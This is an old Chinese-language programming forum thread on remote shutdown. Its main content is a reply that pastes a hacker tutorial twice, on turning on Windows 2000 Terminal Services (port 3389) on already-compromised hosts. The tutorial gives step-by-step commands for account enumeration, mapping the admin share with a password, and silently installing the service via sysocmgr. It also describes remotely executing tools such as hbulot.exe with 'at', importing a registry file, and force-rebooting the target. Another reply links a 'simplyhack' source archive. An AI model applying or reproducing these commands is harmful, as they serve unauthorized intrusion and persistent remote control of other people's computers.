9,506
社区成员
发帖
与我相关
我的任务
分享请发表友善的回复…
发表回复
smallrascal 2003-10-20
- 打赏
- 举报
完整的VB源代码
http://www.sijiqing.com/vbgood/download/code/simplyhack.zip
http://www.sijiqing.com/vbgood/download/code/simplyhack.zip
syman815 2003-10-19
- 打赏
- 举报
实现远程关机的方法很多:
1、可以用远程控制工具,比如Windows2000自带的远程控制就是一项很好的工具!
2、也可以利用一些木马工具等!
我个人有以下想法仅供参考:
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
网络攻击——终端服务(3389)篇
Windows2000终端服务由于使用简单、方便等特点,备受众多管理员喜爱,很多管理员都利用它作为远程管理的一个重要工具。而且在Windows平台发起DDOS攻击,也需要大量开了终端服务的肉鸡。然而,正是由于它使用简单、方便、不与当前用户产生一个交互式登录,可以在后台登录操作,它也受到了黑客的青睐。现在黑客比较流行做法是在成功入侵目标机器后想尽办法,不惜重启对方对方计算机来达到安装终端服务,其目的十分明确,就是方便自己进入进行操作。也正是这些原因,导致它的安全性倍受非议。
其实自输入法漏洞诞生以来,终端服务还没有出现什么大的漏洞,虽然输入法漏洞给无数管理员带来了安全隐患,但平心而论,这个漏洞还不能完完全全说是终端服务的错误,毕竟它也是受害者。
1. 如何有效地启动远程主机的终端服2. 务
得到了一台主机的管理员权限,但我们失望的发现这台主机并没有安装3389终端服务组件,是不是有些懊丧呢?别急,下面我们一起来探索一下远程开启3389的方法.首先我们应该了解3389终端服务,可以运行在什么系统下,个人了解,终端服务在MS的大部分产品中都可运行,如:winnt4/win2000server/win2000ADV-server/XP等.我们在以下的讨论中,是以win2000server和高级server为例的.(现在用的也最多).从上面的的介绍可以知道,2000专业版是不可以远程安装终端服务的,那我们就要首先来判断此主机是专业版还是服务器版,才能进入下一个环节.
我们可以先用对方所开帐户判断: c:\>letmein \\192.168.0.1 -all -d
num0= Administrator ()
num1= Guest ()
num2= IUSR_servername (Internet 来宾帐号 )
num3= IWAM_servername (启动 IIS 进程帐号)
num4= TsInternetUser (TsInternetUser)
一般情况num2/3/4这三个帐户都是2000server默认开启的.2000专业版默认是不开这些帐户的.我们也可以扫描对方开放的端口进一步确认:用扫描软件如:superscan3.exe扫描对方所开端口判断对方是否开启25,3372等2000server默认开启的端口.当然我们还可以使用一些工具,如:cmdinfo.zip 这2个东东可以获得本地或远程NT/2K主机的版本,系统路径,源盘路径,PACK版本,安装时间等一系列信息,一个图形界面,一个命令行.通过返回的信息就可以很清楚的了解对方主机情况.还有一些其他的方法来判断,如:从对方所开的服务来确定等,从上面的判断准确率还算高,别的就不一一说明了.如果你在以上步骤里发现对方主机并没有那3个帐户,默认端口也没开,或cmdinfo返回的信息对方是2000专业版,你就要放弃安装3389的计划了.
现在我们要进入下一环节:判断终端服务到底有没有安装?你也许要问:为什么还要判断啊?我扫描没有发现3389端口啊?这里就需要解释一下,如果装了终端服务组件,可能有哪几种情况扫描不到3389端口?
1)终端服务termservice在"管理工具"—>"服务"中被禁用.
2)终端服务连接所需的RDP协议在"管理工具"—>"终端服务配置"中被停用连接.
3)终端服务默认连接端口3389被人为的改变.
4)终端服务绑定的网络适配器不是外网的.
5)防火墙和端口过滤之类的问题.
其实,我们遇到最多的情况就是以上5种情况.现在开始判组件是否被安装.先与远程主机连接,映射远程主机C盘为本地Z盘
net use z: \\192.168.0.1\c$ "7788" /user:"administrator"
然后转到Z盘,检查 Z:\Documents and Settings\All Users\「开始」菜单\程序\管理工具> 里是否有 "终端服务管理器"和"终端服务配置"的快捷方式文件 如有已安装服务组件的会有,反之,没有(98% 人为故意删的可能性较小) 我们还可以在下一步telnet到对方主机后使用终端服务自带的命令进一步的核实.判断完毕,对方好像是没有安装终端服务组件,可以进入下一步: telnet登陆对方主机,准备安装服务组件.在这里,我强烈建议使用2000自带的telnet服务端登陆, 有回显,不容易出错.个人感觉使用它,一次成功的比例高很多.就算没有开,打开用完后再关掉就完了.
假如我们已开启对方23端口,登陆:C:\>telnet 192.168.0.1
进入后,再次检查终端组件是否安装: c:\>query user 这个工具需要安装终端服务.这样就进一步确定了组件体有没有被安装.如果返回:
USERNAME SESSIONNAME ID STATE IDLE TIME LOGON TIME
>w1 console 0 运行中 . 2002-1-12 22:5\\类似这样的信息,可能组件就已安装.
都清楚了,可以开始启动终端服务(开启3389)了.
一)服务器命令开3389
1) 检查INF文件的位置:C:\>dir c:\sysoc.inf /s
2)检查组件安装程序:C:\> dir c:\sysocmgr.* /s
3)这是建立无人参与的安装参数
c:\>echo [Components] > c:\wawa
c:\>echo TSEnable = on >> c:\wawa
4)//检查参数文件
c:\>type c:\wawa
[Components]
TSEnable = on
5)安装组件c:\>sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\wawa /q
以上这条命令没有加/R参数,主机在安装完后自动重起.如若加了/R参数主机就不会重起.如果一切正常的话,几分钟后对方主机将会离线,当它重新回来时,3389终端服务就已经开启.你就可以连上去了.
二)用脚本开3389
用rots.vbs开启终端服务,
说明cscript ROTS.vbs <目标IP><用户名><密码>[服务端口][自动重起选项]
格式:cscript.exe rots.vbs ip user userpassport/r
或者:cscript.exe rots.vbs ip user userpassport/fr
注意:脚本访问的是目标的135端口,如果目标135端口未开放,或者WMI服务关闭,那么脚本就没有用了。
三)用hbulot.exe开3389
1)C:\>net use \\ip\ipc$ “”/user:administrator
2)C:\>copy hbulot.exe \\ip\admin$
3)C:\>net time \\ip
4)C:\>at \\ip runtime hbulot.exe /r
四)用djxyxs.exe开3389
方法同上,志不过不需要另外的命令来重启计算机,它自身就具备重启功能
五)注册表开3389
上传3389.reg到目标主机,然后运行
C:\>at \\ip runtime regedit.ext /s 3389.reg
C:\>psshutdown.exe -f \\ip
1、可以用远程控制工具,比如Windows2000自带的远程控制就是一项很好的工具!
2、也可以利用一些木马工具等!
我个人有以下想法仅供参考:
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
网络攻击——终端服务(3389)篇
Windows2000终端服务由于使用简单、方便等特点,备受众多管理员喜爱,很多管理员都利用它作为远程管理的一个重要工具。而且在Windows平台发起DDOS攻击,也需要大量开了终端服务的肉鸡。然而,正是由于它使用简单、方便、不与当前用户产生一个交互式登录,可以在后台登录操作,它也受到了黑客的青睐。现在黑客比较流行做法是在成功入侵目标机器后想尽办法,不惜重启对方对方计算机来达到安装终端服务,其目的十分明确,就是方便自己进入进行操作。也正是这些原因,导致它的安全性倍受非议。
其实自输入法漏洞诞生以来,终端服务还没有出现什么大的漏洞,虽然输入法漏洞给无数管理员带来了安全隐患,但平心而论,这个漏洞还不能完完全全说是终端服务的错误,毕竟它也是受害者。
1. 如何有效地启动远程主机的终端服2. 务
得到了一台主机的管理员权限,但我们失望的发现这台主机并没有安装3389终端服务组件,是不是有些懊丧呢?别急,下面我们一起来探索一下远程开启3389的方法.首先我们应该了解3389终端服务,可以运行在什么系统下,个人了解,终端服务在MS的大部分产品中都可运行,如:winnt4/win2000server/win2000ADV-server/XP等.我们在以下的讨论中,是以win2000server和高级server为例的.(现在用的也最多).从上面的的介绍可以知道,2000专业版是不可以远程安装终端服务的,那我们就要首先来判断此主机是专业版还是服务器版,才能进入下一个环节.
我们可以先用对方所开帐户判断: c:\>letmein \\192.168.0.1 -all -d
num0= Administrator ()
num1= Guest ()
num2= IUSR_servername (Internet 来宾帐号 )
num3= IWAM_servername (启动 IIS 进程帐号)
num4= TsInternetUser (TsInternetUser)
一般情况num2/3/4这三个帐户都是2000server默认开启的.2000专业版默认是不开这些帐户的.我们也可以扫描对方开放的端口进一步确认:用扫描软件如:superscan3.exe扫描对方所开端口判断对方是否开启25,3372等2000server默认开启的端口.当然我们还可以使用一些工具,如:cmdinfo.zip 这2个东东可以获得本地或远程NT/2K主机的版本,系统路径,源盘路径,PACK版本,安装时间等一系列信息,一个图形界面,一个命令行.通过返回的信息就可以很清楚的了解对方主机情况.还有一些其他的方法来判断,如:从对方所开的服务来确定等,从上面的判断准确率还算高,别的就不一一说明了.如果你在以上步骤里发现对方主机并没有那3个帐户,默认端口也没开,或cmdinfo返回的信息对方是2000专业版,你就要放弃安装3389的计划了.
现在我们要进入下一环节:判断终端服务到底有没有安装?你也许要问:为什么还要判断啊?我扫描没有发现3389端口啊?这里就需要解释一下,如果装了终端服务组件,可能有哪几种情况扫描不到3389端口?
1)终端服务termservice在"管理工具"—>"服务"中被禁用.
2)终端服务连接所需的RDP协议在"管理工具"—>"终端服务配置"中被停用连接.
3)终端服务默认连接端口3389被人为的改变.
4)终端服务绑定的网络适配器不是外网的.
5)防火墙和端口过滤之类的问题.
其实,我们遇到最多的情况就是以上5种情况.现在开始判组件是否被安装.先与远程主机连接,映射远程主机C盘为本地Z盘
net use z: \\192.168.0.1\c$ "7788" /user:"administrator"
然后转到Z盘,检查 Z:\Documents and Settings\All Users\「开始」菜单\程序\管理工具> 里是否有 "终端服务管理器"和"终端服务配置"的快捷方式文件 如有已安装服务组件的会有,反之,没有(98% 人为故意删的可能性较小) 我们还可以在下一步telnet到对方主机后使用终端服务自带的命令进一步的核实.判断完毕,对方好像是没有安装终端服务组件,可以进入下一步: telnet登陆对方主机,准备安装服务组件.在这里,我强烈建议使用2000自带的telnet服务端登陆, 有回显,不容易出错.个人感觉使用它,一次成功的比例高很多.就算没有开,打开用完后再关掉就完了.
假如我们已开启对方23端口,登陆:C:\>telnet 192.168.0.1
进入后,再次检查终端组件是否安装: c:\>query user 这个工具需要安装终端服务.这样就进一步确定了组件体有没有被安装.如果返回:
USERNAME SESSIONNAME ID STATE IDLE TIME LOGON TIME
>w1 console 0 运行中 . 2002-1-12 22:5\\类似这样的信息,可能组件就已安装.
都清楚了,可以开始启动终端服务(开启3389)了.
一)服务器命令开3389
1) 检查INF文件的位置:C:\>dir c:\sysoc.inf /s
2)检查组件安装程序:C:\> dir c:\sysocmgr.* /s
3)这是建立无人参与的安装参数
c:\>echo [Components] > c:\wawa
c:\>echo TSEnable = on >> c:\wawa
4)//检查参数文件
c:\>type c:\wawa
[Components]
TSEnable = on
5)安装组件c:\>sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\wawa /q
以上这条命令没有加/R参数,主机在安装完后自动重起.如若加了/R参数主机就不会重起.如果一切正常的话,几分钟后对方主机将会离线,当它重新回来时,3389终端服务就已经开启.你就可以连上去了.
二)用脚本开3389
用rots.vbs开启终端服务,
说明cscript ROTS.vbs <目标IP><用户名><密码>[服务端口][自动重起选项]
格式:cscript.exe rots.vbs ip user userpassport/r
或者:cscript.exe rots.vbs ip user userpassport/fr
注意:脚本访问的是目标的135端口,如果目标135端口未开放,或者WMI服务关闭,那么脚本就没有用了。
三)用hbulot.exe开3389
1)C:\>net use \\ip\ipc$ “”/user:administrator
2)C:\>copy hbulot.exe \\ip\admin$
3)C:\>net time \\ip
4)C:\>at \\ip runtime hbulot.exe /r
四)用djxyxs.exe开3389
方法同上,志不过不需要另外的命令来重启计算机,它自身就具备重启功能
五)注册表开3389
上传3389.reg到目标主机,然后运行
C:\>at \\ip runtime regedit.ext /s 3389.reg
C:\>psshutdown.exe -f \\ip
